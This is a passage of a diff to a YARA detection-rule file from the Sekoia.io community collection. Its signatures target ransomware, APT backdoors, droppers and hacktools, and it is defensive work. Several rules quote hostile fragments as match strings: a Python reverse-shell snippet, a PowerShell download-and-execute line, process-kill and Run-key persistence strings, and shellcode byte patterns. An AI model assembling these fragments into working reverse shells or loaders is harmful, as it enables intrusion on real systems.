-		$str09 = "SeImpersonatePrivilege" ascii
+		$ = "\\x64\\Release\\Dropper.pdb"
+		$ = "TelegramRat\\lastest\\Dropper"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 6 of them
+		all of them or pe.imphash ( ) == "92b8e9dea06fd5719e29a510e95b92ac" or hash.md5 ( pe.rich_signature.clear_data ) == "ba1ea20fe779ef0b747e5073c0881a99" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "c0471e0a78eef692b567cd89eeaddf08" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "965dc8b7c98325ca3d3371ced8424823" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "bae1db350e313bf7bbd3b2178b20e6f6dd9b0331780099374edae5a99625bc5b" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "1abb447513b4435837029933e722b6ed92222291571a8ce0a306c9f6a335aa19" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ffbcd5bbe6c02aa5c993886811d7597f020abd6665fc82af133c5756ab72fb0a" )
 }
-rule SEKOIA_Ransomware_Win_Scransom : FILE
+rule SEKOIA_Apt_Apt29_Quarterrig
 {
 	meta:
-		description = "Finds ScRansom samples based on specific strings"
+		description = "Detects QUARTERRIG"
 		author = "Sekoia.io"
-		id = "ea799295-1332-49c6-9816-035b91fc9b4f"
-		date = "2023-08-24"
+		id = "e370ed7e-5e12-4add-95f3-3773ea8e2d03"
+		date = "2023-04-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ransomware_win_scransom.yar#L1-L31"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "3b8034bc5e0919d6c05dd2f2079c40836f241f2db02c1baf70ecb530db90847f"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt29_quarterrig.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "9628418789a9bc24c7e44dbc9106ffa6316aefebe33b91c749b54cb5462b1309"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "TIMATOMAFULL" wide
-		$str02 = ".Encrypted" wide
-		$str03 = ".Encrypting" wide
-		$str04 = "File Name :" wide
-		$str05 = "File size :" wide
-		$str06 = "TIMATOMA#" wide
-		$str07 = "Already Encrypted" wide
-		$str08 = "HOW TO RECOVERY FILES.TXT" wide
-		$str09 = "%d folder(s) searched and %d file(s) found - %.3f second(s)" wide
-		$str10 = "Search cancelled -" wide
-		$str11 = "note.txt" wide
-		$str12 = "Cannot sort the list while a search is in progress." wide
-		$str13 = "Cancelling search, please wait..." wide
-		$str14 = "Error showing process list" wide
-		$str15 = "[System Process]" wide
-		$str16 = "taskkill /f /im" wide
-		$str17 = "kill.bat" wide
+		$str_dll_name = "hijacker.dll"
+		$str_import_name = "VCRUNTIME140.dll"
+		$op_resolve_and_call_openthread = { 48 [6] 48 [6] 8B D8 E8 [4] [3] 33 D2 B9 FF FF 1F 00 FF D0 }
+		$op_resolve_and_call_suspendthread = { E8 [4] 48 8B CB FF D0 83 F8 FF }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 15 of them
+		all of them
 }
-rule SEKOIA_Hacktool_Fscan_Strings : FILE
+rule SEKOIA_Ransomware_Win_Avoslocker : FILE
 {
 	meta:
-		description = "Detects fscan based on strings"
+		description = "Detect AvosLocker ransomware (2021-07)"
 		author = "Sekoia.io"
-		id = "6bef80c3-370c-4168-9d88-3fac88f986b1"
-		date = "2023-12-06"
+		id = "fc5c2483-48cb-4282-b6cb-ac728b948607"
+		date = "2021-08-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_fscan_strings.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b1c88af2f90921fab4ac32ef65e226a652b8df2915abc62de0a28af9ad59811c"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ransomware_win_avoslocker.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "d7f14f78ac569011ecf964109c72d75de4942361033a544350a2f73c7af64a0c"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash6 = "f810deb1ba171cea5b595c6d3f816127fb182833f7a08a98de93226d4f6a336f"
+		hash7 = "c0a42741eef72991d9d0ee8b6c0531fc19151457a8b59bdcf7b6373d1fe56e02"
+		hash8 = "84d94c032543e8797a514323b0b8fd8bd69b4183f17351628b13d1464093af2d"
 
 	strings:
-		$ = "Plugins.RdpScan.func1"
-		$ = "Plugins.smb1AnonymousConnectIPC.func1"
-		$ = "WebScan/WebScan.go"
-		$ = "Plugins/CVE-2020-0796.go"
-		$ = "Plugins.SshConn.func4"
-		$ = "Plugins.PostgresScan"
-		$ = "Plugins.(*FCGIClient).Request.func1"
+		$s1 = "cryptopp850\\rijndael_simd.cpp" ascii
+		$s2 = "cryptopp850\\sha_simd.cpp" ascii
+		$s3 = "cryptopp850\\gf2n_simd.cpp" ascii
+		$s4 = "cryptopp850\\sse_simd.cpp" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 30MB and 4 of them
+		all of them and uint16( 0 ) == 0x5A4D and filesize > 900KB and filesize < 950KB
 }
-rule SEKOIA_Apt_Apt41_Keyplug_Dropper : FILE
+rule SEKOIA_Tool_Generic_Python_Reverse_Shell_Strings : FILE
 {
 	meta:
-		description = "Detects a dropper used by keyplug"
+		description = "Detects reverse shell"
 		author = "Sekoia.io"
-		id = "b6740371-c4c3-437e-8235-0bd4f7b9c3f5"
-		date = "2024-06-12"
+		id = "5b926d15-4f21-428c-a9fa-ee085a98d42b"
+		date = "2024-04-16"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt41_keyplug_dropper.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a61f57302d8fe58ed8b77542c94159acbc36a3bd52c204171e76e668d10a74e7"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_generic_python_reverse_shell_strings.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "bb4fcef595f4be035815f536786987ac1343727f16c0560a1cb593e854ba8f17"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -231761,26 +232390,24 @@ rule SEKOIA_Apt_Apt41_Keyplug_Dropper : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "C:\\ProgramData\\pfm.ico" wide
-		$ = "C:\\\\ProgramData\\\\pfm.ico" wide
-		$ = "67f8de349abc5ghi" wide
-		$ = "3abc64597f8diegh" wide
+		$ = "import sys,socket,os,pty;"
+		$ = "[os.dup2(s.fileno(),fd) for fd in (0,1,2)]"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 2MB and any of them
+		all of them and filesize < 1000
 }
-rule SEKOIA_Tool_Powershell_Unicorn : FILE
+rule SEKOIA_Apt_Sugargh0Stcampaign_Malicious_Lnk : FILE
 {
 	meta:
-		description = "Detects Unicorn Powershell"
+		description = "Detects malicious LNK used in SugarGh0st campaign"
 		author = "Sekoia.io"
-		id = "287c1669-2ee1-488e-bf66-a99bfe309c90"
-		date = "2022-08-23"
+		id = "4297c150-d125-49b9-8850-fcedf5284ae9"
+		date = "2023-12-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_powershell_unicorn.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "8be79789cf77d4f304d9fef4ad6a2d2ac7686b015fff3301fb3e369f2f06230a"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_sugargh0stcampaign_malicious_lnk.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "9efa131fdb02f31812c8a3f2053e1b60d0970c748eb0f82aed92a1c0719e048c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -231788,25 +232415,24 @@ rule SEKOIA_Tool_Powershell_Unicorn : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ").value.toString() ('JAB" ascii wide
-		$ = ").value.toString());powershell (" ascii wide
-		$ = "powershell /w 1 " ascii wide
+		$ = "dir /S/b *.lnk " wide
+		$ = "%temp%\\*.lnk" wide
 
 	condition:
-		all of them and filesize < 100KB
+		uint32be( 0 ) == 0x4c000000 and filesize < 1MB and all of them
 }
-rule SEKOIA_Rat_Win_Ratel_Strings : FILE
+rule SEKOIA_Tool_Win_Snap2Html : FILE
 {
 	meta:
-		description = "Detect RATel based on characteristic strings"
+		description = "Finds Snap2HTML samples based on specific strings. Legitimate tool used by ransomware affiliates to perform discovery"
 		author = "Sekoia.io"
-		id = "d0c8b89b-c811-47aa-9e03-717998c40d91"
-		date = "2023-04-24"
+		id = "9865daac-f23b-417e-813e-cbed03f45161"
+		date = "2024-02-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_win_ratel_strings.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ff5640b03ec3e535cdb86c2a0feb52d0c472928ff88a36ec9f66ac8aa07c9f69"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_win_snap2html.yar#L1-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "8805a80193ba1323dffd68456833f27cc93f2182660a5047dbe69e8ed65ac184"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -231814,173 +232440,168 @@ rule SEKOIA_Rat_Win_Ratel_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "[-] Error when changing folder." ascii
-		$s2 = "cmd.exe" wide
-		$s3 = "back slash find: " ascii
-		$s4 = "MOD_ALL:" wide
-		$s5 = "MOD_PERSISTENCE" wide
-		$s6 = "MOD_DESTRUCTION:" wide
-		$s7 = "MOD_RECONNECT" wide
-		$s8 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide
-		$s9 = "powershell.exe -command \"([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')\"" wide
-		$s10 = "The command was executed successfully but no data was returned."
-		$s11 = "[-] TIMEOUT IN CREATEPROCESS, but all the processes in the name of: " ascii
-		$s12 = "we were well and truly killed." ascii
+		$str01 = "Snap2HTML.exe" fullword wide ascii
+		$str02 = "Snap2HTML.Properties" ascii
+		$str03 = "set_txtRoot" ascii
+		$str04 = "set_chkHidden" ascii
+		$str05 = "set_chkSystem" ascii
+		$str06 = "set_chkLinkFiles" ascii
+		$str07 = "set_txtLinkRoot" ascii
+		$str08 = "set_chkOpenOutput" ascii
+		$str09 = "set_txtTitle" ascii
+		$str10 = "get_CancellationPending" ascii
+		$str11 = "set_RootFolder" ascii
+		$str12 = "add_SettingsLoaded" ascii
 
 	condition:
-		( uint16be( 0 ) == 0x4d5a ) and filesize > 500KB and filesize < 3MB and 8 of them
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-rule SEKOIA_Hacktool_Credentialkatz : FILE
+rule SEKOIA_Apt_Muddywater_Muddyc2Go_Dll_Launcher_Strings : FILE
 {
 	meta:
-		description = "Finds ChromeKatz (CredentialKatz version) standalone samples based on the strings"
+		description = "Detects MuddyC2Go DLL launcher"
 		author = "Sekoia.io"
-		id = "4795d131-2625-40ca-bca6-02aac5030b55"
-		date = "2024-10-30"
+		id = "59756195-d842-4038-8fbf-43d26f4353bc"
+		date = "2024-03-07"
 		modified = "2024-12-19"
-		reference = "https://github.com/Meckazin/ChromeKatz"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_credentialkatz.yar#L1-L34"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "2762e066128e186526c5ff272fc9184c0262d81d8c513e6515c25c189418931c"
-		logic_hash = "dbfc0a6e8ad6701a071cb76564a2aeb9924ff7f13306f5dca1e1045c51f07ae7"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_muddywater_muddyc2go_dll_launcher_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "1a0827082d4b517b643c86ee678eaa53f85f1b33ad409a23c50164c3909fdaca"
+		logic_hash = "b91653e313258ebd2073a398d0467800056ac94adab02c3a83aa8a379710e4e6"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Don't use your cat's name as a password!" ascii
-		$str02 = "[-] Failed to parse command line argument /pid!" ascii
-		$str03 = "[*] Targeting process: %ls on PID: %lu" ascii
-		$str04 = "CredentialStore: NotSet" ascii
-		$str05 = "CredentialStore: AccountStore" ascii
-		$str06 = "CredentialStore: ProfileStore" ascii
-		$str07 = "[*] Number of available credentials: %zu" ascii
-		$str08 = "[+] Found browser process: %d" ascii
-		$str09 = "Failed to read credential struct" wide
-		$str10 = "Error reading right node" wide
-		$str11 = "Failed to read the root node from given address" wide
-		$str12 = "Error reading first node" wide
-		$str13 = "chrome.dll" wide
-		$str14 = "    Domain:" ascii
-		$str15 = "    Password:" ascii
-		$str16 = "Found %ls main process PID: %lu" ascii
-		$str17 = "---------------" ascii
-		$str18 = "CredentialKatz" ascii wide
+		$ = "-Method GET -ErrorAction Stop;Write-Output $response.Content;iex $response.Content;"
+		$ = "GetCurrentProcess"
+		$ = "TerminateProcess"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 5 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 50KB and all of them
 }
-rule SEKOIA_Apt_Aptk47_Maliciouslnk : FILE
+
+rule SEKOIA_Tool_Pchunter_And_Related_Certificate : FILE
 {
 	meta:
-		description = "Detects APT-K-47 malicious LNK"
+		description = "Detects PCHunter and associated binairies & drivers"
 		author = "Sekoia.io"
-		id = "2ccc8777-26fe-4018-9646-4ea91394fe78"
-		date = "2024-11-22"
+		id = "757c7738-4ee8-4b4e-bdda-0c5b0c010f40"
+		date = "2022-09-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_aptk47_maliciouslnk.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "6a405d4e88b4acb9706e19a83aad9cf6"
-		logic_hash = "865bb08f57affb3795853aa3c9f49577efb74df9b32e7760263b9fb08246a3ab"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_pchunter_and_related_certificate.yar#L3-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "924a85b2eaec73b628e705b3bb2e464582a71c19317d2023b1422b1b8ad97a51"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$ = "[/c for /f" wide
-		$ = "2^>nul') do copy" wide
-		$ = "%F in ('where /r %Temp%" wide
-
 	condition:
-		uint32be( 0 ) == 0x4c000000 and all of them
+		uint16be( 0 ) == 0x4d5a and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial contains "05:51:bc:8c:6a:a2:ca:03:2b:c6:71:38:30:d8:49:a3" ) and filesize > 400KB and filesize < 20MB
 }
-rule SEKOIA_Apt_Apt33_Falsefont : FILE
+rule SEKOIA_Apt_Toneshell_Shellcode : FILE
 {
 	meta:
-		description = "FalseFont backdoor"
+		description = "Detects first bytes of ToneShell used to call the shellcode or the code to check the MagicNumber (0x17 0x03 0x03)"
 		author = "Sekoia.io"
-		id = "d77c1f5b-9898-456f-954a-ac1f0907a2ba"
-		date = "2024-03-25"
+		id = "5ac8d2e9-dbeb-42f9-8343-1281510d4411"
+		date = "2024-10-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt33_falsefont.yar#L1-L38"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "2eafe15d8e0df1b63b32463c4b44a9dc1d4251d01c15be20e4285c31e75b8348"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_toneshell_shellcode.yar#L1-L34"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0e164677681dce2aa75d3621d9f3df1449c3e67a3551817693856d80ccc48eca"
 		score = 75
-		quality = 53
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s0 = "Agent.Core.WPF"
-		$s1 = "data2.txt" wide fullword
-		$s2 = "data.txt" wide fullword
-		$s3 = "Loginvault.db" wide fullword
-		$command1 = "ExecUseShell" ascii
-		$command2 = "ExecAndKeepAlive" ascii
-		$command3 = "CMD" ascii
-		$command4 = "PowerShell" ascii
-		$command5 = "KillByName" ascii
-		$command6 = "KillById" ascii
-		$command7 = "Download" ascii
-		$command8 = "Upload" ascii
-		$command9 = "Delete" ascii
-		$command10 = "GetDirectories" ascii
-		$command11 = "ChangeTime" ascii
-		$command12 = "SendAllDirectory" ascii
-		$command13 = "UpadateApplication" ascii
-		$command14 = "Restart" ascii
-		$command15 = "GetProcess" ascii
-		$command16 = "SendAllDirectoryWithStartPath" ascii
-		$command17 = "GetDir" ascii
-		$command18 = "GetHard" ascii
-		$command19 = "GetScreen" ascii
-		$command20 = "StopSendScreen" ascii
+		$code = {55 8b ec 83 ec 0c e8 85 00 00 00 6a 00 6a 00 6a 02 6a 00 6a 00 68 00 00 00 10}
+		$MagicNumberParser = {
+        B8 01 00 00 00
+        6B C8 00
+        8B 55 ??
+        0F BE 04 0A
+        83 F8 17
+        75 ??
+        B9 01 00 00 00
+        C1 E1 00
+        8B 55 ??
+        0F BE 04 0A
+        83 F8 03
+        75 ??
+        B9 01 00 00 00
+        D1 E1
+        8B 55 ??
+        0F BE 04 0A
+        83 F8 03
+        }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 15 of ( $command* ) and 3 of ( $s* )
+		any of them and filesize < 1MB
 }
-
-rule SEKOIA_Apt_Menupass_Maliciouslibvlc_Dll
+rule SEKOIA_Apt_Muddywater_Rotrot_Strings : FILE
 {
 	meta:
-		description = "Detects the malicious LibVLC variants used by MenuPass"
+		description = "Detects RotRot backdoor based on strings"
 		author = "Sekoia.io"
-		id = "8b6b56f3-33b5-41cf-8bcb-e653c98718bd"
-		date = "2022-04-06"
+		id = "f7bc195a-0e60-4495-b78a-78f101543700"
+		date = "2024-06-10"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_menupass_maliciouslibvlc_dll.yar#L3-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "de56e112a477d3a77146f1b84c8aa3e66a382a87f1492dd50aa1de9458b33717"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_muddywater_rotrot_strings.yar#L1-L36"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "425168003d0f14d791e7f46bf47c18652a1f6b66b9329155d2bca72cf0d8126b"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$s1 = "qsphsbnebub"
+		$s2 = "rtqitcofcvc"
+		$s3 = "surjudpgdwd"
+		$s4 = "tvskveqhexe"
+		$s5 = "uwtlwfrifyf"
+		$s6 = "vxumxgsjgzg"
+		$t1 = "MpbeMjcsbs"
+		$t2 = "NqcfNkdtct"
+		$t3 = "OrdgOleudu"
+		$t4 = "PsehPmfvev"
+		$t5 = "QtfiQngwfw"
+		$t6 = "RugjRohxgx"
+		$u1 = "UfsnjobufKpcPckfdu"
+		$u2 = "VgtokpcvgLqdQdlgev"
+		$u3 = "WhuplqdwhMreRemhfw"
+		$u4 = "XivqmrexiNsfSfnigx"
+		$u5 = "YjwrnsfyjOtgTgojhy"
+		$u6 = "ZkxsotgzkPuhUhpkiz"
+
 	condition:
-		pe.DLL and pe.number_of_exports < 15 and for all i in ( 0 .. pe.number_of_exports - 1 ) : ( pe.export_details [ i ] . name contains "libvlc_" )
+		uint16be( 0 ) == 0x4d5a and filesize > 100KB and filesize < 300KB and any of ( $s* ) and any of ( $t* ) and any of ( $u* )
 }
-rule SEKOIA_Apt_Darkpink_Sample : FILE
+rule SEKOIA_Apt_Mustangpanda_Zpakage : FILE
 {
 	meta:
-		description = "Detects two parts of cmd.exe /c "
+		description = "Detect obfuscation seen in ZPAKAGE"
 		author = "Sekoia.io"
-		id = "91b4c64a-7622-4f03-bd3f-9fe56f01dfbe"
-		date = "2023-06-05"
+		id = "a4767d12-5058-4a26-be62-0cec685917bd"
+		date = "2023-03-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_darkpink_sample.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "8dc3f6179120f03fd6cb2299dbc94425451d84d6852b801a313a39e9df5d9b1a"
-		logic_hash = "c9d3952036bffe2d924ea553fd53f8b6f0b3f16f1060fbde69496c800d4d5ad9"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_mustangpanda_zpakage.yar#L1-L31"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "711c0e83f4e626a7b54e3948b281a71915a056c5341c8f509ecba535bc199bee"
+		logic_hash = "52ad51589ca154fbf6e5829a2c80a9b811809288bed6995820a0ca8aa218d8ef"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -231988,24 +232609,36 @@ rule SEKOIA_Apt_Darkpink_Sample : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$cmd_xor_part_1 = {DF 00 A1 00 E4 00 F0 00 4B 00 3A 00 D1 00 C4 00}
-		$cmd_xor_part_2 = {bc 00 cc 00 80 00 d0 00 64 00 59 00 F1 00 E6 00 FD 00 83 00 C6}
+		$chunk_1 = {
+        88 94 1D ?? ?? ?? ??
+        8A 84 1D ?? ?? ?? ??
+        83 ?? ??
+        88 84 1D ?? ?? ?? ??
+        8A 84 1D ?? ?? ?? ??
+        83 ?? ??
+        88 84 1D ?? ?? ?? ??
+        8A 84 1D ?? ?? ?? ??
+        83 ?? ??
+        88 84 1D ?? ?? ?? ??
+        0F BE 8C 1D ?? ?? ?? ??
+        0F BE 84 1D ?? ?? ?? ??
+        }
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and filesize < 11MB and #chunk_1 > 20
 }
-rule SEKOIA_Apt_Mustangpanda_Coolclient : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_8 : FILE
 {
 	meta:
-		description = "Detect COOLCLIENT via obfuscation & specific string"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "2f8fdb66-03a2-400f-808b-56ae1b276d2f"
-		date = "2023-03-27"
+		id = "e28a1cd3-f7b6-4a55-8229-484e0bbeb7cb"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_mustangpanda_coolclient.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "9fd552604299ecb8fa28042ee26e72bbe4fb9804ad087bf4a373b2c2e17d43b0"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/generic_sharpshooter_payload_8.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "71e4eb41968818e1dd484a259af9eec30a517423b00da75ce21773bf695cbc7d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -232013,93 +232646,102 @@ rule SEKOIA_Apt_Mustangpanda_Coolclient : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = {eb 14 ea 50 eb 0b ea 8b c4 a8 01 74 06 eb 0b}
-		$s2 = {66 0f d6 44 24 eb eb}
-		$s3 = "c:\\windows\\syste" fullword
+		$ = "Private Function decodeHex(hex)"
+		$ = "Dim serialized_obj"
+		$ = "decodeHex = EL.NodeTypedValue"
+		$ = "d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
+		all of them and filesize < 2MB
 }
-rule SEKOIA_Malware_Win_Passlib : FILE
+rule SEKOIA_Backdoor_Win_Spacecolon : FILE
 {
 	meta:
-		description = "Detect the Passlib malware"
+		description = "Finds Spacecolon samples based on specific strings (ScHackTool component)"
 		author = "Sekoia.io"
-		id = "609999e2-a644-4bf3-bce2-b0e1b0e7094b"
-		date = "2022-07-28"
+		id = "ae09f0e2-e913-44d5-abe1-715170368cc8"
+		date = "2023-08-25"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/malware_win_passlib.yar#L1-L32"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5e76f7c40a00182ee076720b4c19a45e82a8ce11740fdd8e9419f9d9e93cdb41"
+		reference = "https://www.welivesecurity.com/en/eset-research/scarabs-colon-izing-vulnerable-servers/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_win_spacecolon.yar#L1-L39"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
